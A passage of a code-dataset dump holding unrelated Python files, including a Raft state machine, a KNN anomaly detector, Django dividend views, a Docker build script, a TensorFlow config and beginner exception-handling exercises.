use\")\n#\n# def begin(self):\n# self.in_orion = config_from_env() is not None\n# self.decoder = MoleculeSerializerMixin()\n# self.need_decode = not self.args.data_out.endswith(\".oeb.gz\")\n# if self.in_orion:\n# self.ofs = MultipartDatasetUploader(self.args.data_out,\n# tags=[self.name],\n# backend=self.args.backend)\n# elif self.need_decode:\n# self.ofs = oechem.oemolostream(str(self.args.data_out))\n# else:\n# self.ofs = open(str(self.args.data_out), 'wb')\n#\n# def write(self, mol, port):\n# if self.in_orion or not self.need_decode:\n# self.ofs.write(mol)\n# else:\n# oechem.OEWriteMolecule(self.ofs, self.decoder.decode(mol))\n#\n# def end(self):\n# if self.in_orion:\n# self.ofs.complete()\n# else:\n# self.ofs.close()","sub_path":"ComplexPrepCubes/port.py","file_name":"port.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236715839","text":"from graph import Graph\nfrom vertex import Vertex\nfrom edge import Edge\n\ndef buildGraph(graphCommands, n):\n \"\"\" The buildGraph function takes a list of graph commands to interpret, and runs through the list executing their instructions.\n\n Args: graphCommands A list of graph commands to execute\n n A number to label the graph being built with\n\n The function first counts each type of command it is given and displays that, then it runs through the list and creates a second list of streamlined commands. Following that it builds the graph by instantiating an object and executing the relevant commands.\n\n \"\"\"\n commands = []\n commentCount = 0\n graphCount = 0\n vertexCount = 0\n edgeCount = 0\n\n print(\"Building graph\", str(n+1) + \".\")\n print(\"Number of commands:\", len(graphCommands))\n\n for command in graphCommands:\n if command[0] == '--':\n commentCount += 1\n elif command[0] == 'new':\n graphCount += 1\n elif command[0] == 'add':\n if command[1] == 'vertex':\n vertexCount += 1\n elif command[1] == 'edge':\n edgeCount += 1\n\n print(\"Comments:\", commentCount)\n print(\"Graphs:\", graphCount)\n print(\"Vertices:\", vertexCount)\n print(\"Edges:\", edgeCount, \"\\n\")\n\n for command in graphCommands:\n if command[0] == '--':\n continue\n elif command[0] == 'new':\n commands.append(['new'])\n elif command[0] == 'add':\n if command[1] == 'vertex':\n commands.append(['vertex', command[2]])\n elif command[1] == 'edge':\n commands.append(['edge', command[2], command[4], float(command[5])])\n else:\n print('Invalid command:', command[0], command[1])\n else:\n print('Invalid command:', command[0])\n\n\n graphObj = None\n\n for command in commands:\n if command[0] == '--':\n continue\n elif command[0] == 'new':\n graphObj = Graph(n + 1)\n elif command[0] == 'vertex':\n graphObj.addVertex(Vertex(command[1]))\n elif command[0] == 'edge':\n startVertex = graphObj.getVertex(command[1])\n endVertex = graphObj.getVertex(command[2])\n weight = float(command[3])\n graphObj.addEdge(Edge(startVertex, endVertex, weight))\n else:\n print('Invalid command:', command)\n\n\n if graphObj is None:\n print(\"No new graph created.\")\n else:\n return graphObj\n","sub_path":"Assignments/Assignment4/code/python/graphBuilder.py","file_name":"graphBuilder.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598498356","text":"\"\"\"\n Created by alexandra at 04.09.19 18:15\n Calculate topological invariant of a 1d insulator in 010 direction \n at high symmetry 
point Gamma, K or M \n\"\"\"\n\nfrom math import sin, cos, pi\nimport cmath\n\n\ndef q(k, d):\n \"\"\"Off diagonal element of flat hamiltonian in 010 direction\"\"\"\n lamb = sin(k)**2 + (cos(k) + h + d)**2\n return (\n 2 * sin(k) * (cos(k) + h + d)\n - 1j * (sin(k)**2 - (cos(k) + h + d)**2)\n ) / lamb\n\n\ndef invariant(kx, ky):\n delta = cos(kx) + cos(ky)\n q0 = q(0, delta)\n p = 0\n for idy in range(Nk - 1):\n ky = 2 * pi * (idy + 1) / (Nk - 1)\n q1 = q(ky, delta)\n p += -cmath.phase(q0.conjugate() * q1) / 2 / pi\n q0 = q1\n return p\n\n\nh = 1.5\nNk = 100\nprint(invariant(0, 0))\n","sub_path":"TopInvariant1D.py","file_name":"TopInvariant1D.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174245998","text":"# machine.py\n#\n# The Raft state machine\n\nfrom .message import RequestVote, RequestVoteResponse, AppendEntries, AppendEntriesResponse\n\nclass LogEntry:\n def __init__(self, term, entry):\n self.term = term\n self.entry = entry\n def __repr__(self):\n return f'LogEntry({self.term}, {self.entry})'\n def __eq__(self, other):\n return (self.term, self.entry) == (other.term, other.entry)\n\nclass RaftMachine:\n def __init__(self, control):\n self.control = control # All configuration/system dependent details in control\n\n self.term = 0 # Must be a persistent value (Eventually)\n self.state = Follower \n self.votedFor = None # Who voted for in current term\n\n self.log = [ ] # Persistent data. Part of controller?\n\n # Volatile state (on all servers)\n self.commitIndex = -1 # Highest log entry known to be committed\n self.lastApplied = -1 # Highest log entry applied to state machine\n\n # There is state that is initialized just on the leader (when becoming leader)\n self.reset_leader()\n\n # Transactions on the state machine. 
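invariant() above accumulates the phase change of the off-diagonal element q(k) as k runs once around the Brillouin zone, i.e. a winding number. The same sum works for any smooth closed curve that avoids zero; a self-contained check on q(k) = exp(2ik), which winds twice:

import cmath
from math import pi

def winding(q, n=400):
    # Sum the per-step phase increments of q around the circle, then divide by 2*pi.
    total, q0 = 0.0, q(0.0)
    for i in range(1, n + 1):
        q1 = q(2 * pi * i / n)
        total += cmath.phase(q1 / q0) / (2 * pi)
        q0 = q1
    return round(total)

print(winding(lambda k: cmath.exp(2j * k)))  # 2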
These represent actions that need to\n # result in persistent state and logged.\n def append_entries(self, previndex, prevterm, entries):\n assert all(isinstance(e, LogEntry) for e in entries)\n if previndex + 1 > len(self.log):\n return False\n if previndex >= 0 and self.log[previndex].term != prevterm:\n return False\n self.log[previndex+1:] = entries\n return True\n\n def update(self, name, value):\n setattr(self, name, value)\n \n def reset_leader(self):\n # On becoming leader, these values are reset.\n\n # Next index is the next log index to be sent on append_entries\n self.nextIndex = { peer: len(self.log) for peer in self.control.peers }\n\n # Match index is the highest known index for matching logs\n self.matchIndex = { peer: -1 for peer in self.control.peers }\n \n # Who voted for in current election\n self.votedFor = None\n\n # Generic dispatch for any message\n def handle_Message(self, msg):\n if msg.term > self.term:\n self.term = msg.term\n self.state = Follower\n getattr(self, f'handle_{type(msg).__name__}')(msg)\n\n # Different message types that could be received\n def handle_AppendEntries(self, msg):\n self.state.handle_AppendEntries(self, msg)\n\n def handle_AppendEntriesResponse(self, msg):\n if msg.term == self.term:\n self.state.handle_AppendEntriesResponse(self, msg)\n\n def handle_RequestVote(self, msg):\n self.state.handle_RequestVote(self, msg)\n\n def handle_RequestVoteResponse(self, msg):\n if msg.term == self.term:\n self.state.handle_RequestVoteResponse(self, msg)\n\n def handle_ElectionTimeout(self):\n self.state.handle_ElectionTimeout(self)\n\n def handle_LeaderTimeout(self):\n self.state.handle_LeaderTimeout(self)\n\n def send_AppendEntries(self):\n # Send an AppendEntries message to all peers\n for dest in self.control.peers:\n self.send_AppendEntry(dest)\n\n def send_AppendEntry(self, dest):\n # Send a single AppendEntry message to one server\n prevLogIndex = self.nextIndex[dest] - 1\n prevLogTerm = self.log[prevLogIndex].term if prevLogIndex >= 0 else -1\n self.control.send_message(\n AppendEntries(\n dest=dest,\n term=self.term,\n prevLogIndex=prevLogIndex,\n prevLogTerm=prevLogTerm,\n entries=self.log[prevLogIndex+1:],\n leaderCommit=self.commitIndex\n )\n )\n\nclass RaftState:\n @staticmethod\n def handle_AppendEntries(machine, msg):\n print('handle_AppendEntries not implemented')\n\n @staticmethod\n def handle_AppendEntriesResponse(machine, msg):\n print('handle_AppendEntriesResponse not implemented')\n\n @staticmethod\n def handle_RequestVote(machine, msg):\n if (msg.term < machine.term or \n (msg.term == machine.term and \n machine.votedFor is not None and\n machine.votedFor != msg.source)):\n machine.control.send_message(\n RequestVoteResponse(dest=msg.source,\n term=machine.term,\n voteGranted=False\n )\n )\n\n else: # This needs more work (there are issues with log being up to date)\n machine.votedFor = msg.source\n machine.control.send_message(\n RequestVoteResponse(dest=msg.source,\n term=machine.term,\n voteGranted=True\n )\n )\n machine.control.reset_election_timer()\n\n @staticmethod\n def handle_RequestVoteResponse(machine, msg):\n print('handle_RequestVoteResponse not implemented')\n\n @staticmethod\n def handle_ElectionTimeout(machine):\n print('handle_ElectionTimeout not implemented')\n\n @staticmethod\n def handle_LeaderTimeout(machine):\n print('handle_LeaderTimeout not implemented')\n\nclass Follower(RaftState):\n @staticmethod\n def handle_ElectionTimeout(machine):\n machine.state = Candidate\n machine.term += 1\n machine.votedFor = 
machine.control.id # I vote for myself\n machine.control.reset_election_timer()\n machine.votesGranted = 1\n\n # Send a RequestVote to all other servers\n for dest in machine.control.peers:\n machine.control.send_message(\n RequestVote(dest=dest,\n term=machine.term,\n lastLogIndex = len(machine.log) - 1,\n lastLogTerm = machine.log[len(machine.log)-1].term if machine.log else -1\n )\n )\n\n @staticmethod\n def handle_AppendEntries(machine, msg):\n logOk = (msg.prevLogIndex == -1 or (\n msg.prevLogIndex >= 0 and\n msg.prevLogIndex < len(machine.log) and\n msg.prevLogTerm == machine.log[msg.prevLogIndex].term\n )\n )\n if msg.term < machine.term or not logOk:\n # Failure\n machine.control.send_message(\n AppendEntriesResponse(\n dest=msg.source,\n term=machine.term,\n success=False,\n matchIndex=-1\n )\n )\n else:\n # Appending should work\n ok = machine.append_entries(msg.prevLogIndex,\n msg.prevLogTerm,\n msg.entries)\n \n assert ok\n machine.control.send_message(\n AppendEntriesResponse(\n dest=msg.source,\n term=machine.term,\n success=True,\n matchIndex=msg.prevLogIndex+len(msg.entries)\n )\n )\n\nclass Leader(RaftState):\n @staticmethod\n def handle_AppendEntriesResponse(machine, msg):\n # If the operation was successful, update leader settings for the follower\n if msg.success:\n machine.matchIndex[msg.source] = msg.matchIndex\n machine.nextIndex[msg.source] = msg.matchIndex+1\n\n # Check for consensus on log entries\n matches = sorted(machine.matchIndex.values())\n machine.commitIndex = matches[len(machine.matchIndex)//2]\n\n else:\n # It failed for this follower. Immediately retry with a\n # lower nextIndex value\n machine.nextIndex[msg.source] -= 1\n machine.send_AppendEntry(msg.source)\n\n @staticmethod\n def handle_LeaderTimeout(machine):\n # Must send an append entries message to all followers\n machine.send_AppendEntries()\n\n # Must reset the leader timeout\n machine.control.reset_leader_timeout()\n\n\nclass Candidate(RaftState):\n @staticmethod\n def handle_RequestVoteResponse(machine, msg):\n if msg.term < machine.term: # Ignore (out of date message)\n pass\n\n if msg.voteGranted:\n machine.votesGranted += 1\n if machine.votesGranted > (machine.control.nservers // 2):\n machine.state = Leader\n machine.reset_leader()\n # Upon leadership change, send an empty AppendEntries\n machine.send_AppendEntries()\n machine.control.reset_leader_timeout()\n \n @staticmethod\n def handle_ElectionTimeout(machine):\n # Oh well. 
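Back to square one.\n # (added, descriptive note) a candidate whose election timed out reuses the\n # follower election path below, which bumps the term and requests votes again.\n # 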
Call a new election for myself\n Follower.handle_ElectionTimeout(machine)\n\n @staticmethod\n def handle_AppendEntries(machine, msg):\n if msg.term == machine.term:\n # Convert to follower and handle message\n machine.state = Follower\n machine.handle_AppendEntries(msg)\n\n\n","sub_path":"dabeaz/raft/machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":9189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"328008768","text":"from tkinter import *\nroot=Tk()\nroot.title(\"My First window\")\n\ndef msg(event=\"\"):\n print(\"Good morning\")\n\n\nroot.bind(\"<Return>\",msg)\nentry=Entry(root)\nentry.place(x=50,y=50)\nbtn1=Button(root,text=\"Button1\",fg=\"red\",bg=\"yellow\",font=(\"Comic Sans Ms\",15,\"bold\"),command=msg)\nbtn1.place(x=100,y=100)\nquitbutton = Button(root, text=\"Close Me\", command=quit)\nquitbutton.pack()\nroot.geometry(\"400x500+400+100\")\nroot.resizable(0,0)\nroot.mainloop()","sub_path":"tkinterplace.py","file_name":"tkinterplace.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"143402216","text":"# Test the cp_lib.app_base module\n\nimport logging\nimport time\nimport unittest\n\nimport cp_lib.time_until as time_until\n\n\nclass TestTimeUntil(unittest.TestCase):\n\n def test_seconds_until_next_minute(self):\n \"\"\"\n :return:\n \"\"\"\n\n print() # move past the '.'\n\n now = time.time()\n logging.debug(\"Now = {} sec\".format(time.asctime()))\n\n result = time_until.seconds_until_next_minute(now)\n logging.debug(\"Result = {} sec\".format(result))\n\n # self.assertTrue(os.path.exists(expect))\n\n return\n\n\nif __name__ == '__main__':\n # logging.basicConfig(level=logging.INFO)\n logging.basicConfig(level=logging.DEBUG)\n unittest.main()\n","sub_path":"test/test_time_until.py","file_name":"test_time_until.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"449614805","text":"from sklearn.neighbors import NearestNeighbors\nfrom sklearn.neighbors import KDTree\nimport numpy as np\n\nclass knn():\n def __init__(self, k, anomaly_ratio):\n self.k = k \n self.leaf_size = 30\n self.metric = 'euclidean'\n self.anomaly_ratio = anomaly_ratio\n def run(self,data):\n #find kth nearest neighbor\n kdt = KDTree(data, self.leaf_size, self.metric)\n k_dist, k_index = kdt.query(data, self.k+1) #find the distances and the indexes of k nearest neighbor of all instances\n kth_dist = k_dist[:,self.k] # for each instance, select the distance to the kth nearest neighbor\n\n return kth_dist\n def detect_anomaly(self, kth_dist):\n # find the instances with largest distances as anomalies\n num_anomalies = int(self.anomaly_ratio * len(kth_dist)) # number of anomalies we are expecting; cast to int so it can be used as a slice bound\n distance_descending = np.argsort(kth_dist)[::-1]\n anomalies_index = distance_descending[:num_anomalies]\n return anomalies_index\n\n","sub_path":"Algorithms/baselines/knn/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"276412650","text":"import datetime\n\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\n\nimport options\nimport helpers\n\nstart_date = datetime.datetime(year=2019, month=4, day=3)\n\n\ndag = DAG(\n 'counters_cleaner',\n description='Saving statistics',\n schedule_interval='0 0 * * 
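*',  # (added note) standard cron fields: minute hour day-of-month month day-of-week\n # i.e. this DAG runs once a day, at midnight: '0 0 * * 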
*',\n start_date=start_date,\n dagrun_timeout=datetime.timedelta(minutes=10),\n catchup=False,\n default_args=options.dag_default_kwargs,\n)\n\noperator = BashOperator(\n task_id='counters_cleaner_task',\n bash_command=helpers.get_python_cmd('counters_cleaner.py'),\n depends_on_past=False,\n dag=dag,\n)\n","sub_path":"misc/airflow/dags/counters_cleaner.py","file_name":"counters_cleaner.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"152612477","text":"# Create your views here.\n\nfrom django.views.generic.list import ListView\n\nfrom django.http import HttpResponseRedirect\nfrom django.views import View\n\nimport pandas as pd\nimport io\nimport csv\n\nfrom django.urls import reverse\n\nfrom django_gotolong.amfi.models import Amfi\nfrom django_gotolong.bstmtdiv.models import BstmtDiv\nfrom django_gotolong.indices.models import Indices\nfrom django_gotolong.fratio.models import Fratio\nfrom django_gotolong.trendlyne.models import Trendlyne\nfrom django_gotolong.gweight.models import Gweight\nfrom django_gotolong.dividend.models import Dividend\n\nfrom django_gotolong.lastrefd.models import Lastrefd, lastrefd_update\n\nfrom django.db.models import OuterRef, Subquery, ExpressionWrapper, F, IntegerField, Count\nfrom django.db.models import (Sum, Count)\nfrom django.db.models.functions import (Round)\n\nimport fuzzymatcher\n\n\nclass DividendListView(ListView):\n model = Dividend\n\n # if pagination is desired\n # paginate_by = 300\n # filter_backends = [filters.OrderingFilter,]\n # ordering_fields = ['sno', 'nse_symbol']\n\n def get_queryset(self):\n return Dividend.objects.all().filter(divi_user_id=self.request.user.id)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass DividendTickerListView(ListView):\n model = Dividend\n\n # if pagination is desired\n # paginate_by = 300\n # filter_backends = [filters.OrderingFilter,]\n # ordering_fields = ['sno', 'nse_symbol']\n\n def get_queryset(self):\n return Dividend.objects.all().filter(divi_user_id=self.request.user.id). 
\\\n values('divi_ticker').annotate(Total=Round(Sum('divi_amount'))).order_by('-Total')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass DividendRefreshView(View):\n fr_buy = {}\n fr_hold = {}\n fr_enabled = {}\n isin_industry_dict = {}\n debug_level = 1\n\n def get(self, request):\n self.dividend_refresh(request)\n return HttpResponseRedirect(reverse(\"dividend-list\"))\n\n def __init__(self):\n super(DividendRefreshView, self).__init__()\n\n def dividend_refresh(self, request):\n debug_level = 1\n # declaring template\n template = \"dividend/dividend_list.html\"\n\n df_bstmtdiv = pd.DataFrame.from_records(BstmtDiv.objects.all().\n filter(bsdiv_user_id=self.request.user.id).values())\n df_amfi = pd.DataFrame.from_records(Amfi.objects.all().values())\n\n left_on = [\"bsdiv_remarks\", ]\n right_on = [\"comp_name\", \"nse_symbol\"]\n\n # get the header\n bstmtdiv_top = df_bstmtdiv.head()\n print('df_bstmtdiv: columns')\n print(bstmtdiv_top)\n\n # Most of these were matching to CANFINHOMES due to FIN in it\n\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='FINDIV', value='DIV', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='FIN DIV', value='DIV', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='FINALDIV', value='DIV', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='FINAL DIV', value='DIV', inplace=True, regex=True)\n\n # most of these were matching with M&M for mahindra and mahindra ltd\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='LTD', value='', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='Ltd', value='', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='LIMITED', value='', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='Limited', value='', inplace=True, regex=True)\n\n matched_results = fuzzymatcher.fuzzy_left_join(df_bstmtdiv,\n df_amfi,\n left_on,\n right_on,\n left_id_col='bsdiv_id',\n right_id_col='comp_rank')\n\n # drop NaN\n matched_results.dropna(inplace=True)\n print(\"matched_results\")\n print(matched_results)\n\n cols = [\n \"bsdiv_id\", \"bsdiv_user_id\", \"bsdiv_date\", \"bsdiv_remarks\", \"comp_name\", \"nse_symbol\", \"bsdiv_amount\",\n \"best_match_score\"\n ]\n\n df = matched_results[cols].sort_values(by=['best_match_score'], ascending=False)\n\n # drop NaN entries\n df.dropna(inplace=True)\n print(\"df\")\n print(df)\n\n # breakpoint()\n\n # import pdb\n # pdb.set_trace()\n\n # first delete all existing dividend objects\n Dividend.objects.all().filter(divi_user_id=self.request.user.id).delete()\n\n data_set = df.to_csv(header=False, index=False)\n\n io_string = io.StringIO(data_set)\n next(io_string)\n print('first record', io_string)\n skipped_records = 0\n for column in csv.reader(io_string, delimiter=',', quotechar='\"'):\n\n if debug_level > 1:\n print(column)\n\n divi_id = column[0].strip()\n divi_user_id = column[1].strip()\n divi_date = column[2].strip()\n divi_remarks = column[3].strip()\n divi_company = column[4].strip()\n divi_ticker = column[5].strip()\n divi_amount = column[6].strip()\n divi_score = column[7].strip()\n\n try:\n _, created = Dividend.objects.update_or_create(\n divi_id=divi_id,\n divi_user_id=divi_user_id,\n divi_date=divi_date,\n divi_remarks=divi_remarks,\n divi_company=divi_company,\n divi_ticker=divi_ticker,\n divi_amount=divi_amount,\n divi_score=divi_score,\n )\n except Exception as e:\n 
print('Exception ')\n print(e)\n\n # Updated Dividend objects\n lastrefd_update(\"dividend\")\n","sub_path":"django_gotolong/dividend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605595683","text":"import os,sys\nimport string\nfrom optparse import OptionParser\nimport glob\nimport json\nimport subprocess\n\n__version__=\"1.0\"\n__status__ = \"Dev\"\n\n\ndef create_docker_file(prj):\n\n line_list = [\n \"FROM nginx:1.21.0-alpine as production\"\n ,\"ENV NODE_ENV production\"\n ,\"RUN mkdir -p /data/shared/%s\" % (prj)\n ,\"RUN ln -s /data/shared/%s /usr/share/nginx/html/ln2data\" % (prj)\n ,\"RUN ln -s /data/shared/%s/releases /usr/share/nginx/html/ln2releases\" % (prj)\n ,\"RUN ln -s /data/shared/%s/downloads /usr/share/nginx/html/ln2downloads\" % (prj)\n ,\"RUN ln -s /data/shared/%s/releases/ftp /usr/share/nginx/html/ftp\" % (prj)\n ,\"COPY ./build /usr/share/nginx/html\"\n ,\"COPY nginx.conf /etc/nginx/conf.d/default.conf\"\n ,\"EXPOSE 80\"\n ,\"CMD [\\\"nginx\\\", \\\"-g\\\", \\\"daemon off;\\\"]\"\n ]\n with open(\"Dockerfile\", \"w\") as FW:\n FW.write(\"%s\\n\" % (\"\\n\\n\".join(line_list)))\n return\n\n###############################\ndef main():\n\n \n usage = \"\\n%prog [options]\"\n parser = OptionParser(usage,version=\"%prog version___\")\n parser.add_option(\"-s\",\"--server\",action=\"store\",dest=\"server\",help=\"dev/tst/beta/prd\")\n (options,args) = parser.parse_args()\n\n for key in ([options.server]):\n if not (key):\n parser.print_help()\n sys.exit(0)\n\n server = options.server\n\n\n config_obj = json.loads(open(\"./conf/config.json\", \"r\").read())\n\n image = config_obj[\"project\"] + \"_app_%s\" % (server) \n container = \"running_\" + image\n app_port = config_obj[\"app_port\"][server]\n data_path = config_obj[\"data_path\"]\n \n with open(\".env.production\", \"w\") as FW:\n FW.write(\"REACT_APP_SERVER=%s\\n\" % (server))\n FW.write(\"REACT_APP_ROOT_URL=%s\\n\" % (config_obj[\"app_root\"][server]))\n FW.write(\"REACT_APP_API_URL=%s\\n\" % (config_obj[\"api_root\"][server]))\n FW.write(\"REACT_APP_APP_VERSION=1.1\\n\")\n\n\n create_docker_file(config_obj[\"project\"])\n\n cmd_list = []\n if os.path.isdir(data_path) == False:\n cmd_list.append(\"mkdir -p %s\" % (data_path))\n\n cmd = \"npm run build\"\n cmd_list.append(cmd)\n cmd = \"docker build -t %s .\" % (image)\n cmd_list.append(cmd)\n\n for c in [container]:\n cmd = \"docker ps --all |grep %s\" % (c)\n container_id = subprocess.getoutput(cmd).split(\" \")[0].strip()\n if container_id.strip() != \"\":\n cmd_list.append(\"docker rm -f %s \" % (container_id))\n\n cmd = \"docker create --name %s -p 127.0.0.1:%s:80 -v %s:%s %s\" % (container,app_port,data_path, data_path, image)\n cmd_list.append(cmd)\n\n for cmd in cmd_list:\n #print (cmd)\n x = subprocess.getoutput(cmd)\n print (x)\n \n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"app/create_app_container.py","file_name":"create_app_container.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129660063","text":"import tensorflow as tf\nimport os\n\nfrom main import main as m\n\nflags = tf.app.flags\n\n# names and directories 模型名称,文件路径\nflags.DEFINE_string(\"model_name\", \"basic\", \"Model name [basic]\")\nflags.DEFINE_string(\"data_dir\", \"data/squad/small_data\", \"Data dir 
[data/squad]\")\nflags.DEFINE_string(\"run_id\", \"0\", \"to save model\")\nflags.DEFINE_string(\"out_base_dir\", \"out\", \"out base dir [out]\")\nflags.DEFINE_string(\"answer_path\", \"\", \"answer path []\")\nflags.DEFINE_string(\"load_path\", \"\", \"load path []\") # 已有模型地址\nflags.DEFINE_string(\"glove_dir\", \"\", \"\")\n\n# device placement 使用CPU or GPU\nflags.DEFINE_string(\"device\", \"/cpu:0\", \"default device for summing gradients. [/cpu:0]\")\n\n# essential training and test options 运行方式,是否加载已有模型\nflags.DEFINE_string(\"mode\", \"train\", \"train | test | debug\")\nflags.DEFINE_boolean(\"load\", False, \"load saved data? [True]\") # 默认加载已有model\n\n# load data glove相关\nflags.DEFINE_integer(\"glove_vector_size\", 200, \"glove vector size\")\n\n# training / test parameters 训练参数\nflags.DEFINE_integer(\"train_batch_size\",5, \"batch size []\")\nflags.DEFINE_integer(\"num_epochs\", 12, \"total number of epochs for training [12]\")\nflags.DEFINE_string(\"num_steps\", 20000, \"number of steps []\")\nflags.DEFINE_integer(\"load_step\", 0, \"load step [0]\")\nflags.DEFINE_integer(\"init_lr\", 0.5, \"initial learning rate []\")\nflags.DEFINE_integer(\"input_keep_prob\", 0.8, \"keep prob for the dropout of LSTM weights []\")\nflags.DEFINE_integer(\"hidden_size\", 75, \"hidden size\")\nflags.DEFINE_integer(\"max_question_word\", 50, \"a question has 100 words at most\")\nflags.DEFINE_integer(\"max_passage_word\", 500, \"a passage has 300 words at most \")\nflags.DEFINE_integer(\"word_emb_size\", 200, \"word2vec length, related to glove\")\nflags.DEFINE_integer(\"char_emb_size\", 10, \"char-level word embedding size\")\nflags.DEFINE_string(\"cell_fn\", tf.nn.rnn_cell.GRUCell, \"recurrent unit\")\n\n# optimizations\n\n\n# longing and saving options\nflags.DEFINE_integer(\"log_period\", 10, \"log period\")\nflags.DEFINE_integer(\"eval_period\", 10, \"eval period\")\nflags.DEFINE_integer(\"save_period\", 10, \"save period\")\nflags.DEFINE_integer(\"max_to_keep\", 20, \"maximum number of recent checkpoints to keep, save model\")\n\n# threshold for speed and less memory usage\n# advanced training options\n\n# ablation options\nflags.DEFINE_bool(\"use_char_emb\", False, \"use char emb? [True]\")\n# flags.DEFINE_bool(\"\")\n\ndef main(_):\n config = flags.FLAGS\n config.out_dir = os.path.join(config.out_base_dir, config.model_name, str(config.run_id).zfill(2))\n m(config)\n\nif __name__ == \"__main__\":\n tf.app.run()","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"458266832","text":"from main import *\r\nimport os.path\r\n\r\nprint('Blackjack! 
\nif __name__ == \"__main__\":\n tf.app.run()","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"458266832","text":"from main import *\r\nimport os.path\r\n\r\nprint('Blackjack! by Liav')\r\nprint('\\n')\r\n\r\nif os.path.exists('playername.txt'):\r\n player_name = str(open('playername.txt','r').read())\r\n\r\nif os.path.exists('playername.txt') == False:\r\n open('playername.txt','w')\r\n player_name = ''\r\n \r\nif os.path.exists('currentscore.txt'):\r\n whitelist = set('-0123456789')\r\n score_n = ''.join(filter(whitelist.__contains__, open('currentscore.txt','r').read()))\r\n\r\nif os.path.exists('currentscore.txt') == False:\r\n open('currentscore.txt','w')\r\n score_n = 0\r\n\r\ndef invalid_char(text):\r\n whitelist2 = set('0123456789abcdefghijklmnopqrstuvwxyz')\r\n char = ''.join(filter(lambda x: x not in whitelist2, text.lower()))\r\n return len(char) == 0\r\n\r\ndef new_name():\r\n global player_name\r\n while invalid_char(player_name) == False or len(player_name) == 0:\r\n player_name = input('Enter your name please: ')\r\n\r\n else:\r\n open('playername.txt','w').write(player_name)\r\n print('\\n')\r\n print(\"Welcome, \" + color.BOLD + f\"{(player_name)}\" + color.END)\r\n start()\r\n\r\nif len(player_name) == 0:\r\n print('New player!')\r\n new_name()\r\n\r\nif invalid_char(player_name) == False:\r\n print('Invalid name detected.')\r\n new_name()\r\n\r\nelse:\r\n print(\"Welcome back, \" + color.BOLD + f\"{(player_name)}\" + color.END)\r\n print(f\"Your current score is {(score_n)}\")\r\n print('\\n')\r\n start()","sub_path":"welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"631006880","text":"\n\ndef division(dv, dvs):\n \"\"\"Division\n Args:\n dv (float): Dividend\n dvs (float): Divisor\n Returns:\n float: Quotient\n \"\"\"\n res = 0.0\n mensaje = \"\"\n\n try:\n res = dv/dvs\n except ZeroDivisionError as ze:\n print(\"ZeroDivisionError :\", ze.__class__)\n mensaje = \"Division by zero is not allowed\"\n except Exception as e:\n print(\"Exception : \", e.__class__)\n else:\n print(\"The division completed successfully\")\n\n return res, mensaje\n
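\n# (added, illustrative) division(10, 4) returns (2.5, '') while division(1, 0)\n# returns (0.0, 'Division by zero is not allowed').\n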
Error: \", ke.__class__)\n except Exception as e:\n print(\"Excepcion Global\", e.__class__)\n else:\n print(f\"El dato con la llave {llave} correcta\")\n finally:\n print(\"Este bloque se ejecuta siempre\")\n\n\ndef agregar_una_vez(lista, elemento):\n\n try:\n if elemento in lista:\n raise ValueError\n else:\n lista.append(elemento)\n except ValueError as ve:\n print(\n f\"Error: Imposible añadir elementos duplicados => [{elemento}].\", ve.__class__)\n except Exception as e:\n print(\"Excepcion Genral \", e.__class__)\n else:\n \" Pasa por aqui cuando se ejecuta correctamente la logica\"\n finally:\n print(\"Siempre se ejecuta esto........\")\n\n\nif __name__ == \"__main__\":\n\n lista = [1, 5, -2]\n\n \"\"\"elemento = 7\n agregar_una_vez(lista,10)\n agregar_una_vez(lista,8)\n agregar_una_vez(lista,12)\n print(lista)\"\"\"\n\n index = 1\n dato, existe = verifica_elemento_lista(*lista,indice=index)\n print(f\"El dato con el indice = {index} es = {dato} \") if existe != 0 else print(\n \"Lo sentimos no existe el 